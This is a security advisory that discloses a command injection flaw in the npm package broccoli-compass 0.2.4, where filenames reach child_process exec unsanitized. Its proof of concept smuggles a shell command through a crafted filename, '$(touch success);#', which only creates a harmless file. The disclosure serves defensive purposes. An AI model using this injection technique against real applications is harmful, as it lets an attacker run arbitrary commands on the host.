
Vulnerability in broccoli-compass

This report details an arbitrary command injection (ACI) vulnerability affecting broccoli-compass@0.2.4.

Package source

Package description

"Sass-compass plugin for Broccoli"

Vulnerability Overview

Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).

If an attacker-controlled filename is included in the list of files passed to "broccoli-compass" via its "files" option, an attacker can execute arbitrary commands on the operating system on which this package is run.

This vulnerability is due to the use of the child_process exec function without input sanitization: the filenames are spliced into a shell command string, so shell metacharacters in a filename are interpreted by the shell. The Node.js API documentation states that unsanitized user input should never be passed to exec [2].

[1] https://cwe.mitre.org/data/definitions/77.html

[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback

Reproduction

A filename containing a shell command payload must be provided in the list of files that "broccoli-compass" accepts as an argument. This can occur if another Node.js application includes "broccoli-compass" as a dependency and allows user-influenced filenames to reach the "files" list passed to "broccoli-compass".

The proof-of-concept (PoC) program below illustrates the issue. Executing this code causes the command "touch success" to be run, which creates a file called "success".

var compileSass = require('broccoli-compass');
// Stands in for a filename an attacker was able to influence.
var user_provided_filename = '$(touch success);#';
// The filename is passed through the "files" option and ends up in an exec() command string.
compileSass({}, {
    'files': [user_provided_filename]
}).write('.', '.');

Environment: Node.js v15.5.1 on Linux

Steps to reproduce:

  1. npm i broccoli-compass@0.2.4
  2. Create a file, e.g., poc0.js, containing the PoC code.
  3. Execute the file: node poc0.js

A file called "success" is created as a result of executing the PoC.